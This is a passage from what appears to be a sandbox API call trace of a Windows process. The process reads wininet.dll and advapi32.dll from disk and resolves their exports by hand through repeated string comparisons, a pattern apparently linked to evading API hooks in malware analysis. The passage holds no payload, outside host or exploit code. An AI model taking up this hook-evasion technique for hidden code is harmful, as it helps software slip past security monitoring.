(lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0187.709] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0187.709] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0187.709] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0187.709] GetProcessHeap () returned 0x4a0000 [0187.710] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x286600) returned 0x4115040 [0187.930] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0187.930] ReadFile (in: hFile=0x140, lpBuffer=0x4115040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4115040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0188.570] CloseHandle (hObject=0x140) returned 1 [0188.570] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0188.570] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0188.571] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0188.571] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0188.571] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0188.571] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0188.571] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0188.571] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0188.571] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.571] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0188.571] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0188.571] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0188.571] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.571] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0188.571] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0188.571] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0188.571] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0188.571] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.571] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0188.571] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.571] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0188.572] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0188.572] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0188.572] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0188.572] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0188.573] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0188.573] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0188.573] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0188.574] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0188.574] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0188.574] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0188.575] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0188.575] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.575] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0188.576] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0188.576] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0188.577] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0188.577] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0188.577] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0188.577] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0188.577] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.577] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0188.577] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.577] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0188.577] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0188.577] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0188.577] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0188.577] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0188.577] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0188.577] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0188.577] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0188.577] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0188.578] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0188.578] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0188.578] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0188.578] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.578] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0188.579] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0188.580] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0188.581] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0188.581] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0188.581] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0188.581] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0188.581] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0188.581] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0188.581] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0188.581] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0188.581] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0188.581] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0188.581] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0188.581] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0188.581] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0188.581] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0188.581] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0188.581] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0188.581] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0188.581] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0188.581] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0188.581] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0188.581] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0188.582] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0188.582] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0188.582] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0188.582] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0188.582] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0188.582] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0188.582] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0188.582] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0188.582] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0188.582] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0188.582] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0188.792] GetProcessHeap () returned 0x4a0000 [0188.793] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4115040 | out: hHeap=0x4a0000) returned 1 [0188.806] GetProcessHeap () returned 0x4a0000 [0188.807] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b90a0 [0188.811] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0188.811] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0188.811] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0188.811] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0188.812] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" 